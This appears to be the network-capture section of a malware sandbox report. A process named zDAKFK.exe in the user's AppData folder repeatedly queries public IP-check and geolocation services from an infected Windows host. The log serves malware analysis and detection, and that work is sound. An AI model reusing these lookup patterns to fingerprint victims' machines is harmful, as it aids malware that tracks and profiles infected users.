User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 06:20:19.682492018 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:19 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 000205831b344b3340c3e6c5485d3328
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 06:20:19.746239901 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 7, 2024 06:20:21.343811035 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:21 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ab58bfb79de676d5416f067d0318b3c6
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 06:20:22.474281073 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 7, 2024 06:20:23.160422087 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:23 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f78f8a2d142e016fda5d17095e937e89
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 06:20:23.206957102 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 7, 2024 06:20:26.561839104 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:26 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: afb7822e3d6d8657f1ebab661bbb0d69
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49765 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:27.344877005 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49766 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:27.356549025 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49767 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:27.369955063 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49768 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:27.380649090 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49769 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:27.393840075 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 06:20:29.053877115 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:28 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 59e1d7e4398915dc1d8865b570095956
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 06:20:29.096179962 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 7, 2024 06:20:29.254576921 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:29 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c35c0e29b7bfacd2b9397ec37bf1d9ad
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49774 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:30.063080072 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49775 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:30.074259043 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49776 | 193.122.130.0 | 80 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 06:20:30.088620901 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 7, 2024 06:20:30.774023056 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:20:30 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d9b755fcc8855c4eceb7c7775276c544
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                     0 | 192.168.2.4 | 49755 | 188.114.97.3 | 443 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                     2024-11-07 05:20:22 UTC | 87 | OUT | GET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                     Host: reallyfreegeoip.org
                                                                                                                                                                     Connection: Keep-Alive
                                                                                                                                                                     2024-11-07 05:20:22 UTC | 1210 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdiRl7KppdK4WCSdwUr1u%2Bp4GnOJDA6OfgTibMZa5RZ25L%2B7c2CV6X1ILQo70riclhiEXobGAJtjLQEQ388CEMqQ%2F1XsBVWTU8LBnq5%2FBsFs3i1Zw0JCMX1ivsem2cJQ1A%2B0XOBK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfaa8c163462-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1039&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2698974&cwnd=248&unsent_bytes=0&cid=e29f22869a67f00b&ts=443&x=0"
                                                                                                                                                                     2024-11-07 05:20:22 UTC | 159 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</R
                                                                                                                                                                     2024-11-07 05:20:22 UTC | 200 | IN | Data Raw: 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: egionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                     1 | 192.168.2.4 | 49764 | 188.114.97.3 | 443 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                     2024-11-07 05:20:27 UTC | 63 | OUT | GET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                     Host: reallyfreegeoip.org
                                                                                                                                                                     2024-11-07 05:20:27 UTC | 1209 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:27 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 5
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X7uBzLBBWVCzWgGeMkMET2nLipJeRInfYubA4pXUrM%2BdccXIEIQoo27ovNsf7neCdXay29qLT2lVmxYRK5T1vgPAZdKipq2jw4s4joTbPVG99GgEBgPdOrsWZYGuIlkoCUyhKmKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfca69447d57-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1986&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1456008&cwnd=251&unsent_bytes=0&cid=3be702fc48c990ba&ts=158&x=0"
                                                                                                                                                                     2024-11-07 05:20:27 UTC | 160 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</Re
                                                                                                                                                                     2024-11-07 05:20:27 UTC | 199 | IN | Data Raw: 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: gionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                     2 | 192.168.2.4 | 49773 | 188.114.97.3 | 443 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                     2024-11-07 05:20:29 UTC | 63 | OUT | GET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                     Host: reallyfreegeoip.org
                                                                                                                                                                     2024-11-07 05:20:30 UTC | 1217 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:29 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 7
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuJvGBFQcxJboVkrA9AO0C731WJ8y4ed%2BiDyH4UnwotdguvWPYO1PICiYefr8bt6L0jR78ey7tab%2FZ7rw%2B%2FAsFDGVDs5Oq2LkpgXuXq9FoO7V%2BBDNT4Wgao5uf77aNwB7c3QYRMr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfdb4a914677-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2679000&cwnd=247&unsent_bytes=0&cid=13fc597fb45bae90&ts=149&x=0"
                                                                                                                                                                     2024-11-07 05:20:30 UTC | 152 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
                                                                                                                                                                     2024-11-07 05:20:30 UTC | 207 | IN | Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                     3 | 192.168.2.4 | 49778 | 188.114.97.3 | 443 | 7556 | C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                     2024-11-07 05:20:31 UTC | 63 | OUT | GET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                                                     Host: reallyfreegeoip.org
                                                                                                                                                                     2024-11-07 05:20:31 UTC | 1211 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 07 Nov 2024 05:20:31 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                                                    x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                                                    x-cache: Miss from cloudfront
                                                                                                                                                                    via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                                                    x-amz-cf-pop: DFW57-P5
                                                                                                                                                                    x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                    Age: 9
                                                                                                                                                                    Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YAMCgXrvb0W8N6PwbNKuByNHqLhU5Sv2%2Bp0BaPdhY3G2j6mM8Ksd4sDDMoSM1NRj6JMAdnBP6xHsRRkt1iMD2m2undX35MSRiMveHDIxWJZ1K%2FziUJOkQL0W08x4KSLDbvKs5R8R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfe49e27e53e-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1285&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2220858&cwnd=251&unsent_bytes=0&cid=8f6e596cf3ecfc84&ts=153&x=0"
                                                                                                                                                                     2024-11-07 05:20:31 UTC | 158 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
